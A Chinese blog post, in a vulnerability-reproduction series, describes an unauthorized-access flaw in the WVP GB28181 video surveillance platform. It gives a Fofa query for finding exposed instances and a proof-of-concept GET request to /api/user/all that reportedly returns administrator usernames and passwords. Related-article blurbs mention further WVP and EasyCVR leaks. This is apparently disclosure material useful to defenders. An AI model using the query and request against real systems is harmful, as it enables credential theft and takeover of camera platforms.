【漏洞复现】WVP视频平台未授权漏洞

最新推荐文章于 2025-03-28 23:40:56 发布

晚风不及你ღ

最新推荐文章于 2025-03-28 23:40:56 发布

阅读量1.8k

点赞数

文章标签： web安全

本文链接：https://blog.youkuaiyun.com/qq_37113223/article/details/139609279

版权

【漏洞复现】专栏收录该内容

150 篇文章

已下架不支持订阅

本文详细介绍了WVP视频平台存在的未授权访问漏洞，攻击者可通过API接口/api/user获取管理员用户名和密码，影响系统安全性。复现过程中，使用Fofa搜索语法body="国标28181"定位到问题。

摘要生成于 C知道，由 DeepSeek-R1 满血版支持，前往体验 >

漏洞描述：

WVP视频平台api/user存在未授权访问漏洞，攻击者可利用漏洞获取当前系统管理员用户名及密码进行登录系统。

搜索语法:

Fofa-Query: body="国标28181"

漏洞详情：

1.WVP视频平台。

2.POC:

GET /api/user/all HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json

3.漏洞复现结果。

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

晚风不及你ღ

关注关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
1
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

专栏目录

已下架不支持订阅

WVP-GB28181摄像头管理平台 user 信息泄露漏洞复现

0xSec

05-11

2145

WVP-GB28181-pro开源物联网摄像头管理平台api/user接口村存在信息泄露漏洞，攻击者可利用漏洞获取当前系统管理员用户名及密码进行登录系统，使系统处于极不安全的状态

【漏洞复现】GB28181摄像头管理平台-未授权访问-api

知黑而守白

07-10

341

GB28181是中国国家标准中关于IP视频监控设备的标准之一。它规定了视频监控设备之间的通信协议和数据格式，以便实现设备之间的互联互通。GB28181摄像头管理平台则是用于管理和监控这些符合GB28181标准的摄像头设备的软件平台，GB28181摄像头管理平台在安防领域具有广泛的应用，可以用于监控各种场所，如公共交通、城市道路、企业园区等，提高了监控系统的整体效率和管理水平。

1 条评论您还未登录，请先登录后发表或查看评论

开箱即用的GB28181协议视频平台

gitblog_09731的博客

09-05

518

开箱即用的GB28181协议视频平台 wvp-GB28181-pro-wvp-28181-2.0.zip项目地址:https://gitcode.com/open-source-toolkit/d0dc5 概述欢迎使用 wvp-GB28181-pro，一款基于GB28181标准精心打造的高效、灵活的网络视频监控平台。本项目致力于提供一个全面的解决方案，允许用户轻松集成与管理来自不同制造商（如海...

API管理系统【未授权访问】漏洞--POC的应用

最新发布

qq_65379983的博客

03-28

432

API管理系统-未授权访问 未授权获取信息

漏洞复现：WVP-GB28181摄像头管理平台 user 信息泄露

weixin_42207802的博客

05-17

639

漏洞复现：WVP-GB28181摄像头管理平台 user 信息泄露。

GB28181摄像头管理平台WVP视频平台SQL注入漏洞复现 [附POC]

薛定谔嘚喵博客

07-26

1397

GB28181摄像头管理平台WVP视频平台存在SQL注入漏洞，攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息（例如，管理员后台密码、站点的用户个人信息）之外，甚至在高权限的情况可向服务器中写入木马，进一步获取服务器系统权限。

【Docker】部署WVP视频监控平台

Kida 的技术小屋（优快云版）

03-06

6671

今天将会跟大家分享一则关于开源WVP视频监控平台的搭建。先说结论吧，没有用到直接部署的方式而是采用了Docker的部署方案

wvp-GB28181:WEB视频平台是一个基于GB28181-2016标准实现的网络视频平台，负责实现核心信令与设备管理后台部分，支持NAT穿透，支持海康，大华，宇视等品牌的IPC，NVR，DVR接入。流媒体服务基于ZLMediaKit-https

03-19

wvp Web视频平台是一个基于GB28181-2016标准实现的网络视频平台，负责实现核心信令与设备管理后台部分，支持NAT穿透，支持海康，大华，宇视等品牌的IPC，NVR，DVR接入。流媒体服务基于ZLMediaKit- 前端展示基于MediaServerUI- 应用场景：主要应用在IPC等设备没有固定IP地址，但需要在互联网中观看的场景。要求IPC设备可以访问互联网，有云服务器用于部署本服务。预计7个月可以达到商用级别的文档性支持特性： 1，视频预览2，云台控制（方向，缩放控制） 3，视频设备信息同步4，离在线监控5，录像查询和回放（基于NVR \ DVR，暂不支持快进，seek操作） 6，无人观看自动断流 2020路线图： 5月中旬-视频快照（基于NVR \ DVR），设备认证（基于密码） 5月下旬-设备报警6月上旬-流媒体认证（ZLM推流，取流） 6月下旬-语音对

使用 Docker 快速体验 WVP GB28181 视频平台

小康子的博客

03-31

8536

使用 Docker 一步启动 WVP 视频平台，体验效果。

WEB VIDEO PLATFORM (wvp-GB28181-pro) 项目推荐

gitblog_09212的博客

09-13

999

WEB VIDEO PLATFORM (wvp-GB28181-pro) 项目推荐 wvp-GB28181-pro 项目地址: https://gitcode.com/gh_mirrors/wv/wvp-GB28181-pro ...

视频监控汇聚平台EasyCVR未授权访问用户信息泄漏复现 [附POC]

薛定谔嘚喵博客

10-26

467

EasyCVR智能边缘网关存在userlist 信息泄漏，攻击者可以直接登录后台，进行非法操作。

基于ZLMediaKit的wvp-pro网络视频平台部署

bimcc的博客

04-08

1533

是一个开源的多媒体流媒体服务器，使用C++编写，提供高性能、低延迟的流媒体解决方案。它设计用于处理各种多媒体协议，如RTMP、HLS、HTTP-FLV等。ZLMediaKit提供了直播流、点播（VOD）、HTTP API、WebSocket支持等功能。它通常用于构建流媒体平台、视频会议系统、IP摄像头和其他实时多媒体应用程序。基于GB/T 28181-2016标准实现的流媒体平台，依托优秀的开源流媒体服务ZLMediaKit，提供完善丰富的功能。

基于WVP的轻量化智能监控平台

360技术

10-26

5679

当代智能监控平台不乏功能强大的产品，但由于涉及模块、组件多，产品容易臃肿，对私有化场景增加了一定的阻碍。于是，轻量化智能监控平台很有必要。下面为大家一一介绍~01. WVP是什么？WEB VIDEO PLATFORM是一个基于GB28181-2016标准实现的开箱即用的网络视频平台，负责实现核心信令与设备管理后台部分，支持NAT穿透，支持海康、大华、宇视等品牌的IPC、NVR接入。支持国标级联，支...

国标视频平台搭建（三）wvp-28181-pro部署

哈利路亚的收藏夹

10-17

1万+

开箱即用的28181协议视频平台。基于GB/T28181-2016标准信令实现，兼容GB/T28181-2011。自带完整前端页面，开箱即用。完全开源，且使用MIT许可协议。可以在保留版权信息的基础上商用。

ZLMediaKit+wvp-GB28181-pro，搭建28181协议视频平台

热门推荐

Crazy_Cw的博客

10-08

2万+

实现RTSP/RTMP/HLS/HTTP协议的轻量级流媒体框架，支持大并发连接请求。基于GB28181-2016标准实现的开箱即用的网络视频平台，负责实现核心信令与设备管理后台部分，支持NAT穿透，支持海康、大华、宇视等品牌的IPC、NVR接入。支持国标级联，支持将不带国标功能的摄像机/直播流/直播推流转发到其他国标平台。

某网课视频网站漏洞

weixin_46272061的博客

07-08

490

某网课视频网站漏洞漏洞一、漏洞一漏洞一、漏洞一 $.ajax({ type:"POST", url: "****************/mobile/saveProgress", data:{ major_id:"406", chapter_id:"3138", type:'video', current_time:"2910",

windows一键安装部署wvp-GB28181-pro视频监控平台

zengliguang的专栏

06-13

4662

我们可以看到redis、mysql、zlm和wvp都正常运行了。该ip需要修改为wvp服务安装的服务器的IP。默认用户名和密码分别为admin和admin。

wvp平台视频设备接入注意点

zengliguang的专栏

03-05

1634

直接在摄像头或者nvr上进行sip服务器的配置即可配置好了会自动注册，在wvp平台上上线的。

wvp视频调度平台架构布署图

dualvencsdn的博客

08-12

1435

xmpp, 音视频，多人会议

wvp一直转圈视频不播放

01-10

### wvp 视频播放器转圈不播放解决方案当遇到wvp视频播放器显示转圈而不播放的情况时，可能的原因之一在于wvp和zlm版本不匹配。如果使用的wvp是最新的而zlm不是最新版本，则可能会引发兼容性问题[^1]。为了确保两个组件之间的最佳协作，建议更新至相同版本的wvp和zlm。这可以通过访问官方文档或仓库来获取最新的安装包并按照说明完成升级操作。另外一种可能是由于时间戳转换函数`yyyy_MM_dd_HH_mm_ssToTimestamp()`存在日期解析错误所引起的异常情况阻止了正常流程继续执行下去。针对这种情况：对于上述提到的时间戳处理方法中的潜在缺陷，可以尝试修改该部分逻辑以增强其健壮性和准确性。下面是一个改进后的Python实现例子用于替代原有的有问题的方法： ```python from datetime import datetime def convert_to_timestamp(date_string): try: dt_obj = datetime.strptime(date_string, "%Y_%m_%d_%H_%M_%S") timestamp = int(dt_obj.timestamp()) return timestamp except ValueError as e: print(f"Error converting date string to timestamp: {e}") return None ``` 通过以上措施应该能够有效改善wvp视频播放过程中出现只加载不停缓冲的问题。当然，在实际排查期间还需要考虑其他因素如网络状况、服务器配置等也可能影响到最终效果。